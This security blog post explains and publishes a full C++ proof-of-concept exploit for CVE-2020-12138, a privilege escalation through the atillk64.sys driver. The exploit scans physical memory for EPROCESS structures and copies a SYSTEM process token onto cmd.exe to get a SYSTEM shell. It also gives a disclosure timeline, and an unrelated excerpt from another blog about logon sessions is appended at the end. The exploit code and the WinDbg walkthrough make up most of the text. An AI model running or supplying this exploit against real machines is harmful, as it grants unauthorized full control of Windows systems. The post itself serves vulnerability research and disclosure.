kd> dt nt!_EPROCESS ffffd48ca64e7180 UniqueProcessId Token ImageFilename
   +0x2e8 UniqueProcessId : 0x00000000`00000260 Void
   +0x360 Token           : _EX_FAST_REF
   +0x450 ImageFileName   : [15]  "lsass.exe"

So we can see that from the address that would normally be given to us if we did a !poolfind search for “Proc”, it is

  • 0x2e8 to the UniqueProcessId,
  • 0x360 to the Token, and
  • 0x450 to the ImageFileName.

So in our minds right now, our allocations look like this (thanks to ReWolf for breaking this down so well):

  • POOL_HEADER structure (this is where our tag will reside),
  • OBJECT_HEADER_xxx_INFO structures,
  • OBJECT_HEADER, which contains a Body where the EPROCESS structure lives.

The problem I found was that process to process, the size of these structures in between our “Proc” address and the point where our EPROCESS structure begins was wildly varied. Sometimes they were 0x20 in size, sometimes up to 0x90 during my testing. So right now my understanding of these allocations looks something like this:

if <0x10-aligned address> + 0x4 == "Proc"

then <0x10-aligned address> + <some intermediate structure size(somewhere between 0x20 and 0x90 typically)> == <beginning of EPROCESS>

then <beginning of EPROCESS> + 0x2e8 == UniqueProcessId
then <beginning of EPROCESS> + 0x360 == Token
then <beginning of EPROCESS> + 0x450 == ImageFileName

So my code had to account for the varying sizes of these structures; let’s just call them “headers” informally for now. I noticed that all of these “header” structures ended with a 4-byte marker value of 0x00B80003. So what my code would now do is,

  • find “Proc” by looking at 0x10-aligned addresses and looking at the 4-byte value at +0x4,
  • once found, iterate 0x10 at a time up to offset 0xA0 (since the largest header size I found was 0x90) looking for 0x00B80003,
  • take the location of “Proc” and add it to a vector,
  • take the offset to 0x00B80003 and add it to a vector since we need to know this “header” size to calculate our way to the EPROCESS members we’re interested in.
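The marker search in those steps can be sketched as follows, again over a plain byte buffer. The names read_le32 and find_header_size are made up for this illustration, and the 0xA0 search span is passed in as a parameter since the exploit code itself uses a slightly larger bound.

```cpp
#include <cstddef>
#include <cstdint>
#include <vector>

constexpr std::uint32_t kHeaderMarker = 0x00B80003;

// Reads a little-endian DWORD from `data` at byte offset `off`.
inline std::uint32_t read_le32(const std::vector<std::uint8_t>& data, std::size_t off) {
    return  static_cast<std::uint32_t>(data[off])
         | (static_cast<std::uint32_t>(data[off + 1]) << 8)
         | (static_cast<std::uint32_t>(data[off + 2]) << 16)
         | (static_cast<std::uint32_t>(data[off + 3]) << 24);
}

// Walks forward from a "Proc" candidate in 0x10 steps and returns the
// offset of the marker relative to the candidate, or -1 if no marker
// is found within `max_span` bytes (or before the buffer ends).
inline long long find_header_size(const std::vector<std::uint8_t>& data,
                                  std::size_t candidate, std::size_t max_span) {
    for (std::size_t x = 0; x <= max_span && candidate + x + 4 <= data.size(); x += 0x10) {
        if (read_le32(data, candidate + x) == kHeaderMarker) {
            return static_cast<long long>(x);
        }
    }
    return -1;
}
```

Returning -1 lets the caller discard candidates that carry the tag bytes but are not followed by the marker.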

So now that we have both the location of a “Proc” and the size of the header, we can accurately get UniqueProcessId, Token, and ImageFileName values.

  • (“Proc” - 0x4) + header-size + 0x2e8 = UniqueProcessId,
  • (“Proc” - 0x4) + header-size + 0x360 = Token,
  • (“Proc” - 0x4) + header-size + 0x450 = ImageFileName.

As an example, take this “Proc” tag found by !poolfind:

FFFFD48C`B102D320  00 00 B8 02 50 72 6F 63 39 B0 0D A6 8C D4 FF FF  ....Proc9.......
FFFFD48C`B102D330  00 10 00 00 88 0A 00 00 48 00 00 00 FF E8 2E F6  ........H.......
FFFFD48C`B102D340  C0 D4 66 2F 05 F8 FF FF 24 F6 FF FF E8 1F F6 FF  ..f/....$.......
FFFFD48C`B102D350  4A 7F 03 00 00 00 00 00 07 00 00 00 00 00 00 00  J...............
FFFFD48C`B102D360  00 00 00 00 00 00 00 00 93 00 08 00 F6 FF FF E8  ................
FFFFD48C`B102D370  C0 D4 66 2F 05 F8 FF FF 6B 85 EE 27 0F E6 FF FF  ..f/....k..'....
FFFFD48C`B102D380  03 00 B8 00 00 00 00 00 A0 04 0D A2 8C D4 FF FF  ................

We can see that 0xFFFFD48CB102D320 + 0x4 is “Proc”. Our header marker 0x00B80003, denoting where the header ends, is at offset 0x60 from 0xFFFFD48CB102D320. We can test that we can find the ImageFileName given this information as follows:

kd> da 0xFFFFD48CB102D320 + 0x60 + 0x450
ffffd48c`b102d7d0  "svchost.exe"

So this looks promising.
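The same arithmetic can be written down as a small helper. This is only a sketch: the offsets are the ones observed on build 18362 above, and the names MemberAddresses and locate_members are made up for the example.

```cpp
#include <cstdint>

// EPROCESS member offsets observed on Windows 10 build 18362.
constexpr std::uint64_t kPidOffset   = 0x2e8;  // UniqueProcessId
constexpr std::uint64_t kTokenOffset = 0x360;  // Token
constexpr std::uint64_t kNameOffset  = 0x450;  // ImageFileName

struct MemberAddresses {
    std::uint64_t pid;
    std::uint64_t token;
    std::uint64_t image_name;
};

// `chunk` is the 0x10-aligned address whose +0x4 holds "Proc";
// `header_size` is the distance from `chunk` to the 0x00B80003 marker.
inline MemberAddresses locate_members(std::uint64_t chunk, std::uint64_t header_size) {
    const std::uint64_t base = chunk + header_size;
    return MemberAddresses{base + kPidOffset, base + kTokenOffset, base + kNameOffset};
}
```

Calling locate_members(0xFFFFD48CB102D320, 0x60) gives an image_name address of 0xFFFFD48CB102D7D0, matching the address in the da output above.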

Implementing Strategy in Code

One difficulty I faced on my Windows 10 build was that mapping large chunks at a time with DeviceIoControl calling our driver routine would often result in crashes. I didn’t have this problem at all on Windows 7. In my Windows 7 exploit I was able to map a 0x4CCCCCCC byte chunk and parse through the entire thing looking for the values I was after.

On Windows 10, I found the most stable approach to be to map 0x1000 (small page-sized) chunks at a time and then parse through these mapped chunks for my values. If I didn’t find my values, I would map another 0x1000. This too wasn’t crash free. I found that if I made too many mappings I would also crash so I had to find a sweet spot.

I also found that some calls to the driver routine with DeviceIoControl would return a failure. I wasn’t able to completely figure this out but my suspicion is that since our CacheType is hardcoded for us with MmMapIoSpace, if we tried to map pages that had been given a different CacheType in a previous mapping to a virtual address, it would fail. (Does this make sense?)

Picking a physical address to start mapping from is kind of arbitrary but I found the sweet spot on my Windows 10 VM to be around 0x200000000. This VM has about 8 GB of RAM. To limit the amount of mappings, I set a hard cap at 0x240000000 so that my exploit would stop mapping once it hit this address. I also toyed around with adding a limit to the amount of times DeviceIoControl is called but the exploit seems stable enough in testing that this wasn’t necessary in the end.
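For a sense of scale, the range between those two addresses works out as below. This is a rough sketch using the values from my VM; the helper name window_count is made up for the illustration.

```cpp
#include <cstdint>

constexpr std::uint64_t kStart = 0x200000000ULL;  // first physical address mapped
constexpr std::uint64_t kMax   = 0x240000000ULL;  // hard cap
constexpr std::uint64_t kChunk = 0x1000;          // bytes mapped per DeviceIoControl call

// Number of whole chunks between the start address and the cap.
constexpr std::uint64_t window_count(std::uint64_t start, std::uint64_t cap, std::uint64_t chunk) {
    return (cap - start) / chunk;
}

static_assert(kMax - kStart == 0x40000000ULL, "the scanned range is 1 GiB");
static_assert(window_count(kStart, kMax, kChunk) == 0x40000, "1 GiB in 4 KiB chunks");
```

So in the worst case the exploit issues on the order of 262,144 (0x40000) mapping requests before it gives up.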

I used two main functions. The first function maps memory iteratively, looking to identify the physical addresses of “Proc” tags that have our “header marker” value soon after. This function stores the address of each physical location, the size of the header offset, and the size of the offset from the beginning of the memory page to the “Proc” location. It stores all of these values in vectors which are the sole members of a struct which the function returns. The offset to the beginning of the page is simply calculated with a modulus operation and then the remainder is subtracted from the “Proc” location. I wanted to make sure I was always mapping from a nice 0x1000 aligned address. Here is some of that snipped code:

cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
    {
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
        {
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
            exit(1);
        }
        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
            {
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                {
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                    {
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                        {
                            // We found a "header", this is a legit "Proc"
                            proc_count++;

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;
                            
                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;
                            proc_data.page_entry_offset.push_back(modulus);
                            
                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
                            proc_data.proc_address.push_back(
                                page_address);
                            proc_data.header_size.push_back(x);
                        }
                    }
                }
            }
            iteration++;
        }
        else
        {
            // DeviceIoControl failed
            iteration++;
            failures++;
        }
    }
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns struct of three vectors: the page-aligned address of each
    // Proc chunk, its offset within that page, and its header-size.
    return proc_data;
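
The page-alignment step in the snippet above can be isolated into a small helper. This is a sketch only; PageSplit and split_physical_address are names made up for the illustration.

```cpp
#include <cstdint>

constexpr std::uint64_t kPageSize = 0x1000;

struct PageSplit {
    std::uint64_t page_base;    // 0x1000-aligned physical address
    std::uint64_t page_offset;  // distance from page_base to the original address
};

// Splits a physical address into the page that contains it and the
// offset within that page, using the same modulus arithmetic as above.
inline PageSplit split_physical_address(std::uint64_t phys) {
    const std::uint64_t offset = phys % kPageSize;
    return PageSplit{phys - offset, offset};
}
```

For example, 0x200003320 splits into a page base of 0x200003000 and an offset of 0x320. Adding the two back together always recovers the original address.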

The next function takes the returned proc_data struct and, for each entry, re-maps 0x1000 bytes of physical memory, starting not at the “Proc” chunk itself (the tag address - 0x4) but at the beginning of the page that contains it. With the largest header length I found being 0x90 and the largest offset of interest being 0x450, we definitely don’t need to map this much from this address, but I found that mapping anything less would sporadically lead to crashes as it wouldn’t be perfectly page-aligned.

The function knows the “Proc” tag location, the header size, and the offsets for valuable EPROCESS members, and goes looking for any process that is likely to be running as SYSTEM, as defined in a global vector.

vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe
};

If it finds one of these processes and our cmd.exe process, it will overwrite the cmd.exe Token with the Token value of a privileged process, giving us an nt authority\system shell.
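The 64-bit constants in that vector are just the first eight bytes of each ImageFileName read as a little-endian integer. A minimal sketch of how such a constant could be derived is below; pack_image_name is a made-up helper name, and it assumes the bytes after a short name are zero.

```cpp
#include <cstddef>
#include <cstdint>
#include <cstring>

// Packs up to the first 8 characters of `name` into a 64-bit value,
// lowest byte first, mirroring a QWORD read of ImageFileName on a
// little-endian machine. Shorter names are zero-padded.
inline std::uint64_t pack_image_name(const char* name) {
    std::uint64_t value = 0;
    const std::size_t len = std::strlen(name);
    for (std::size_t i = 0; i < 8 && i < len; ++i) {
        value |= static_cast<std::uint64_t>(static_cast<unsigned char>(name[i])) << (8 * i);
    }
    return value;
}
```

Only the first eight characters take part in the comparison, so "services.exe" is matched on "services" alone, and any other process whose name starts with the same eight characters would match too.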

INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.proc_address.size(); i++)
    {
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // members ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i] 
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
                imagename_value);
            if (sys_result != 0 and SYSTEM_found == false)
            {
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            }
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
            {
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            }
        }
        else
        {
            //DeviceIoControl failed
        }
    }
    if ((!cmd_token_addr) or (!SYSTEM_token))
    {
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        exit(1);
    }
    else
    {
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";
        exit(0);
    }
}

As you can see, if we don’t find both a SYSTEM process and our cmd.exe process, the program exits without doing anything. This rarely happened when the test machine had been left running for at least 2-3 minutes after booting.

Searching for 100 process allocations in the pool is somewhat aggressive. The program will exit if it doesn’t find this many before bumping into the hard cap. Keep in mind that it doesn’t start parsing for the EPROCESS data until it has collected 100 “Proc” tag locations. This could mean that the program exits having already identified the relevant process chunks needed to elevate privileges.

This number can be toned down and the exploit could be trivially tweaked to search very small sections of physical memory at a time before exiting, annotating along the way and printing any valuable EPROCESS structure information to the terminal as it progresses. It could for instance be tweaked to search n amount of physical memory, output the location and token values of any privileged process or the cmd.exe process, and then exit while specifying the last memory address that it mapped. You could then start the exploit up again but this time specify the new last memory address mapped and map n from there and repeat until you had everything you needed.
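One way to picture that resumable approach is a helper that works out which slice of physical memory each run should cover. This is purely a sketch of the idea and not part of the exploit; ScanWindow and next_window are hypothetical names.

```cpp
#include <algorithm>
#include <cstdint>

struct ScanWindow {
    std::uint64_t start;  // first physical address to map in this run
    std::uint64_t end;    // one past the last address; feed this to the next run
};

// Returns the slice of `span` bytes beginning at `resume_from`,
// clipped so that it never extends past the hard cap `cap`.
inline ScanWindow next_window(std::uint64_t resume_from, std::uint64_t span, std::uint64_t cap) {
    const std::uint64_t start = std::min(resume_from, cap);
    const std::uint64_t end = std::min(start + span, cap);
    return ScanWindow{start, end};
}
```

Each run would scan from start to end, print whatever token information it found, and report end so the next run can pick up from there. A window whose start equals its end means the cap has been reached.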

The hardest part was finding the cmd.exe process. Likely-to-be-SYSTEM processes were easy to find. If you have a remote-desktop/GUI equivalent access to the host machine, you could open a few cmd.exe processes and greatly improve your odds of finding one to overwrite and elevate privileges.

Even with just one cmd.exe process, I was able to find and overwrite my token roughly 90% of the time. With more than one, it was 100% in my testing.

There are some improvements that can be made to the exploit no doubt, but as is, it works really well in my testing and can be tweaked fairly easily. I believe it sufficiently proves the vulnerability.

Mandatory screenshot:

Huge Thanks

Huge thanks to @FuzzySecurity for all of the tutorials. I’ve recently also finished up his HEVD exploit tutorials and have learned a ton from his blog. Just an awesome resource.

Thanks to @HackSysTeam for the HackSysExtremeVulnerable driver, it has been such a great learning resource and got me started down this path.

Thanks to both @ihack4falafel and @ilove2pwn_ for answering all of my questions along the way or helping me find the answers myself. Very grateful.

Thanks to @TheColonial for his advice about disclosure and his awesome CAPCOM.SYS YouTube video series. I learned a lot of nice WinDBG tricks from this.

Thanks again to @jessemichael for being so helpful and charitable.

Thanks to Jackson T. for not only his blog post but for answering all my questions and being extremely helpful, really appreciate it.

And finally thanks to all those cited blog authors @rwfpl and @hatRiot.

All testing performed on Build 18362.19h1_release.190318-1202.

Please, let me know if you find any errors.

Disclosure Timeline

  • February 25th 2020 – Email, Customer Service Ticket, and Twitter DM sent to GIGABYTE USA
  • February 26th 2020 – Email to AMD psirt with notification of vulnerability found and PoC created
  • February 26th 2020 – Response from psirt to send PoC
  • February 26th 2020 – PoC sent to psirt
  • March 7th 2020 – Ask for update from psirt, no update given
  • March 16th 2020 – Ask for update from psirt
  • March 16th 2020 – psirt responds that the issue has been previously reported and that they don’t support the product as a result
  • March 16th 2020 – I inform psirt that other parties are still packaging and installing the driver and there is no advisory for the driver
  • March 24th 2020 – psirt states that support for the driver ended in late 2019 and to contact GIGABYTE directly
  • April 14th 2020 – No response from GIGABYTE USA, request CVE
  • April 24th 2020 – Assigned CVE-2020-12138, blog posted

Exploit Code

// CVE-2020-12138
// EOP Exploit POC for atillk64.sys by @h0mbre_
// C:\Program Files (x86)\GIGABYTE\RGBFusion\AtiTool\atillk64.sys
// Driver vulnerability referenced in: 
// https://github.com/eclypsium/Screwed-Drivers
// https://eclypsium.com/2019/08/10/screwed-drivers-signed-sealed-delivered/

#include <iostream>
#include <vector>
#include <algorithm>
#include <Windows.h>
#include "h0mbre.h"
using namespace std;

#define DEVICE_NAME         "\\\\.\\atillk64"
#define IOCTL               0x9C402564
#define START_ADDRESS       (INT64)0x200000000   // based off testing my VM
#define MAX_ADDRESS         (INT64)0x240000000   // based off testing my VM

// Creating vector of hex representation of ImageFileNames of common 
// SYSTEM processes, e.g. 'wlms.exe' = hex('exe.smlw')
vector<INT64> SYSTEM_procs = {
    0x78652e7373727363,         // csrss.exe
    0x78652e737361736c,         // lsass.exe
    0x6578652e73736d73,         // smss.exe
    0x7365636976726573,         // services.exe
    0x6b6f72426d726753,         // SgrmBroker.exe
    0x2e76736c6f6f7073,         // spoolsv.exe
    0x6e6f676f6c6e6977,         // winlogon.exe
    0x2e74696e696e6977,         // wininit.exe
    0x6578652e736d6c77,         // wlms.exe
};

// Creating struct for our input buffer to DeviceIoControl
typedef struct {
    INT64 start_address;
    DWORDLONG num_of_bytes;
    DWORDLONG padding;
} INPUT_BUFFER;

// This struct will hold the page-aligned address of a "Proc" tag, the tag's
// offset within that page, and that Proc chunk's header size
struct PROC_DATA {
    std::vector<INT64> proc_address;
    std::vector<INT64> page_entry_offset;
    std::vector<INT64> header_size;
};

// Grabs handle to atillk64.sys
HANDLE get_handle(const char* device_name) {
    HANDLE hFile = CreateFileA(
        device_name,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_READ | FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        0,
        NULL);

    if (hFile == INVALID_HANDLE_VALUE)
    {
        cout << "[!] Unable to grab handle to atillk64.sys.\n";
        exit(1);
    }
    else
    {
        string hex_output = pretty_hex((int)hFile);
        cout << "[>] Successfully grabbed handle to atillk64.sys: "
            << hex_output << "\n";

        return hFile;
    }
}

// Mapping memory from a physical address to our process virtual space
PROC_DATA map_memory(HANDLE device_handle) {

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    string hex_output = pretty_hex((int)output_buff);
    cout << "[>] Output buffer allocated at: " << hex_output << ".\n";

    DWORD bytes_returned = 0;

    PROC_DATA proc_data;

    // failures == unsuccessful DeviceIoControl calls
    int failures = 0;

    // How many legitimate "Proc" chunks we've found in memory as in
    // we've confirmed they have headers.
    int proc_count = 0;
    int iteration = 0;
    cout << "[>] Going fishing for 100 \"Proc\" chunks in RAM...\n\n";
    while (proc_count < 100)
    {
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = START_ADDRESS + (0x1000 * iteration);

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        if (input_buff.start_address > MAX_ADDRESS)
        {
            cout << "[!] Max address reached!\n";
            cout << "[!] Iterations: " << dec << iteration << "\n";
            exit(1);
        }
        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // The virtual address in our process space where RAM was mapped
            // is located in the first 8 bytes of our output_buff.
            INT64 mapped_address = *(PINT64)output_buff;

            // We will read a 32 bit value at offset i + 0x100 at some point
            // when looking for 0x00B80003, so we can't iterate any further
            // than offset 0xF00 here or we'll get an access violation.
            for (INT64 i = 0; i < (0xF10); i = i + 0x10)
            {
                INT64 test_address = mapped_address + i;
                INT32 test_value = *(PINT32)(test_address + 0x4);
                if (test_value == 0x636f7250)   // "Proc"
                {
                    for (INT64 x = 0; x < (0x100); x = x + 0x10)
                    {
                        INT64 header_address = test_address + x;
                        INT32 header_value = *(PINT32)header_address;
                        if (header_value == 0x00B80003) //  "Header" ending
                        {
                            // We found a "header", this is a legit "Proc"
                            proc_count++;

                            // This is the literal physical mem addr for the
                            // "Proc" pool tag
                            INT64 temp_addr = input_buff.start_address + i;

                            // This address might not be page-aligned to 0x1000
                            // so find out how far off from a multiple of 
                            // 0x1000 we are. This value is stored in our 
                            // PROC_DATA struct in the page_entry_offset
                            // member.
                            INT64 modulus = temp_addr % 0x1000;
                            proc_data.page_entry_offset.push_back(modulus);

                            // This is the page-aligned address where, either
                            // small or large paged memory will hold our "Proc"
                            // chunk. We store this as our proc_address member
                            // in PROC_DATA.
                            INT64 page_address = temp_addr - modulus;
                            proc_data.proc_address.push_back(
                                page_address);
                            proc_data.header_size.push_back(x);
                        }
                    }
                }
            }
            iteration++;
        }
        else
        {
            // DeviceIoControl failed
            iteration++;
            failures++;
        }
    }
    cout << "[>] \"Proc\" chunks found\n";
    cout << "    - Failed DeviceIoControl calls: " << dec << failures << "\n";
    cout << "    - Total DeviceIoControl calls: " << dec << iteration << "\n\n";

    // Returns a struct of three vectors: the page-aligned address of each
    // Proc chunk, its offset within that page, and its header size.
    return proc_data;
}

void parse_procs(HANDLE device_handle, struct PROC_DATA proc_data) {

    INT64 SYSTEM_token = 0;
    INT64 cmd_token_addr = 0;
    bool SYSTEM_found = false;

    LPVOID output_buff = VirtualAlloc(
        NULL,
        0x8,
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE);

    for (int i = 0; i < proc_data.proc_address.size(); i++)
    {
        // We need to map 0x1000 bytes from our "Proc" tag so that we can parse
        // out all the EPROCESS members we're interested in. The deepest member
        // is ImageFileName at offset 0x450 from the end of the header. Header
        // sizes varied from 0x20 to 0x90 in my testing. start_address will be
        // the address of the beginning of each 0x1000 aligned address closest
        // to the "Proc" tag we found.
        DWORDLONG num_of_bytes = 0x1000;
        DWORDLONG padding = 0x4141414141414141;
        INT64 start_address = proc_data.proc_address[i];

        INPUT_BUFFER input_buff = { start_address, num_of_bytes, padding };

        DWORD bytes_returned = 0;

        if (DeviceIoControl(
            device_handle,
            IOCTL,
            &input_buff,
            sizeof(input_buff),
            output_buff,
            sizeof(output_buff),
            &bytes_returned,
            NULL))
        {
            // Pointer to the beginning of our process space with the mapped
            // 0x1000 bytes of physmem
            INT64 mapped_address = *(PINT64)output_buff;

            // mapped_address is mapping from our page entry where, on that
            // page, exists a "Proc" tag. Therefore, we need both the header
            // size and the offset from the page entry to the "Proc" tag so
            // we can calculate the static offsets/values of the EPROCESS
            // members ImageFileName, Token, UniqueProcessId...
            INT64 imagename_address = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x450; //ImageFileName
            INT64 imagename_value = *(PINT64)imagename_address;

            INT64 proc_token_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x360; //Token
            INT64 proc_token = *(PINT64)proc_token_addr;

            INT64 pid_addr = mapped_address +
                proc_data.header_size[i] + proc_data.page_entry_offset[i]
                + 0x2e8; //UniqueProcessId
            INT64 pid_value = *(PINT64)pid_addr;

            // See if the ImageFileName 64 bit hex value is in our vector of
            // common SYSTEM processes
            int sys_result = count(SYSTEM_procs.begin(), SYSTEM_procs.end(),
                imagename_value);
            if (sys_result != 0 and SYSTEM_found == false)
            {
                SYSTEM_token = proc_token;
                cout << "[>] SYSTEM process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
                SYSTEM_found = true;
            }
            else if (imagename_value == 0x6568737265776f70 or
                imagename_value == 0x6578652e646d63)  // powershell or cmd
            {
                cmd_token_addr = proc_token_addr;
                cout << "[>] cmd.exe process found!\n";
                cout << "    - ImageFileName value: "
                    << (char*)imagename_address << "\n";
                cout << "    - Token value: " << hex << proc_token << "\n";
                cout << "    - Token address: " << hex << proc_token_addr
                    << "\n";
                cout << "    - UniqueProcessId: " << dec << pid_value << "\n\n";
            }
        }
        else
        {
            //DeviceIoControl failed
        }
    }
    if ((!cmd_token_addr) or (!SYSTEM_token))
    {
        cout << "[!] Token swapping requirements not met.\n";
        cout << "[!] Last physical address scanned: " << hex <<
            proc_data.proc_address.back() << ".\n";
        cout << "[!] Better luck next time!\n";
        exit(1);
    }
    else
    {
        *(PINT64)cmd_token_addr = SYSTEM_token;
        cout << "[>] SYSTEM and cmd.exe token info found, swapping tokens...\n";
        exit(0);
    }
}

void ascii() {

    cout << "\n\n\t     CVE-2020-12138 Proof-of-Concept\n";
    cout << "\t   EOP in ATI Technologies atillk64.sys\n\n";
    cout << "\t\t\t       by @h0mbre_\n\n\n";
}

int main() {

    ascii();

    // Grab handle to our device driver atillk64.sys
    HANDLE hFile = get_handle(DEVICE_NAME);

    // Scan physical memory and return a PROC_DATA struct describing the
    // "Proc" chunks we found
    PROC_DATA proc_data = map_memory(hFile);

    // Look through our PROC_DATA struct for the values we need, ie EPROCESS
    // members for the processes we're interested in
    parse_procs(hFile, proc_data);
}
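
The 64-bit constants compared against imagename_value in parse_procs are simply the first eight bytes of ImageFileName read as a little-endian integer. The following is a minimal Python sketch of that relationship, not part of the PoC; the helper names name_to_int64 and int64_to_name are hypothetical.

```python
import struct

def name_to_int64(name: str) -> int:
    """Take the first 8 ASCII bytes of a process name (NUL-padded) and
    read them as a little-endian 64-bit integer."""
    raw = name.encode("ascii")[:8].ljust(8, b"\x00")
    return struct.unpack("<Q", raw)[0]

def int64_to_name(value: int) -> str:
    """Reverse the conversion and strip the NUL padding."""
    return struct.pack("<Q", value).rstrip(b"\x00").decode("ascii")

print(hex(name_to_int64("powershell.exe")))
print(hex(name_to_int64("cmd.exe")))
print(int64_to_name(0x6568737265776f70))
```

Only eight bytes are compared, so "powershell.exe" is matched on its "powershe" prefix.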

Sharing a Logon Session a Little Too Much

By: tiraniddo
25 April 2020 at 23:34
The Logon Session on Windows is tied to a single authenticated user with a single Token. However, for service accounts that's not really true. Once you factor in Service Hardening there could be multiple different Tokens all identifying in the same logon session with different service groups etc. This blog post demonstrates a case where this sharing of the logon session with multiple different Tokens breaks Service Hardening isolation, at least for NETWORK SERVICE. Also don't forget S-1-1-0, this is NOT A SECURITY BOUNDARY. Lah lah, I can't hear you!

